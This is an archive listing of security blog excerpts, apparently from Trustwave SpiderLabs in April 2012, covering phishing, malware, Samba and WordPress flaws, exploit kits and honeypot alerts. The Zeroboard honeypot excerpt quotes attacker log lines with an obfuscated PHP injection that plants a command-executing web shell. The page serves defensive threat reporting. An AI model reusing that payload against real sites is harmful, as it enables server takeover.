Showing 20 results for: April 2012

Update from Trustwave SpiderLabs EMEA, London

It was a hectic week in London. In case you hadn't heard, it was InfoSec Europe week, but we were also busy with the SC Awards dinner (where PenTest Manager won the innovation award), Bsides London, 44 café, speaking at...

Brazilian Banking Malware: Pay Your Bill Slacker!

I recently got wind of an interesting little sample that I believe originated as part of a Brazilian phishing attack. The sample appears to still be quite unknown, as VirusTotal currently (VirusTotal Report) reports the sample as being detected...

Pwning a Spammer's Keylogger

Recently, while scrounging around our spam traps, I spotted this ordinary piece of malicious spam. It uses a very simple social engineering trick, speculating about Obama's sexual orientation and a link to a supposed picture to prove it. There was...

WordPress 3.3.2 Addresses Setup XSS Vulnerabilities

Back in January we released a security advisory for WordPress, which included four vulnerabilities in the installation scripts. After discussing these issues with the WordPress team, it was decided that the vulnerabilities were not going to be fixed immediately in...

Come and Join Us at InfoSecurity

This week we will be presenting and speaking at InfoSecurity, Europe's No.1 Information Security event (April 24th - 26th). We'll have our stand ready, marked D20, with materials and a small amphitheatre where I will be giving presentations on various...

TrustKeeper Scan Engine Update

Summary: A remote code execution vulnerability in Samba was disclosed last week, which affects Samba versions 3.0.x – 3.6.3 and could allow root access to an affected system from an anonymous user. This TrustKeeper Scan Engine update includes vulnerability checks...

[Honeypot Alert] Joomla com_s5clanroster Local File Inclusion Attacks

Our web honeypots picked up some increased scanning for the following Exploit-DB vulnerability:

[o] Joomla Component S5 Clan Roster Local File Inclusion Vulnerability
Software : com_s5clanroster
Vendor : http://www.shape5.com
Author : AntiSecurity [ s4va Vrs-hCk NoGe OoN_BoY Paman zxvf...

Australian Apple Store Customers Targeted by Phishers

Recently, we came across a phishing attack targeting Australian Apple Store customers. The phishing scam claims to offer a $AU100 Apple Store credit when buying a $9 Australian Dollar Apple discount card. Does it sound legit or too good to...

TrustKeeper Scan Engine Update

TrustKeeper Scan Engine is the scanner that powers Trustwave's Vulnerability Scanning Services, which help organizations around the world find vulnerabilities in their network environments. It also happens to be a key component of the TrustKeeper service that is used by...

Smart Meter Attacks: Old Vectors Die Hard

Much has been made of the recent attacks against a Puerto Rican utility's smart metering system, and perhaps it's warranted in some ways. After all, theft is theft, whether it's power, your bicycle, or beer out of my fridge. Those...

[Honeypot Alert] Zeroboard now_connect() Remote Code Execution Attacks

Our web honeypots recently identified attacks for CVE-2009-4834, which is a vulnerability within Zeroboard:

123.140.193.150 - - [09/Apr/2012:20:11:19 +0900] "GET http://host_removed/admin/access_log/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 304
123.140.193.150 - - [09/Apr/2012:20:11:23 +0900] "GET http://host_removed/zboard.php?id=test/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 290
123.140.193.150 - - [09/Apr/2012:20:11:27 +0900] "GET...

RCE root in all current Samba versions

While perusing the change log for the release of SAMBA that was pushed out today, a member of the SpiderLabs team (Rodrigo Montoro) noticed a CVE number in the change log. When we dug a little deeper we found that...

A New Neighbor in Town: The Nuclear Pack v2.0 Exploit Kit

In the past few years, cybercriminals have been increasingly using exploit kits to spread malware. Today, several exploit kits, primarily Blackhole and Phoenix, dominate this market but occasionally we do find other rare ones that are being deployed. We would...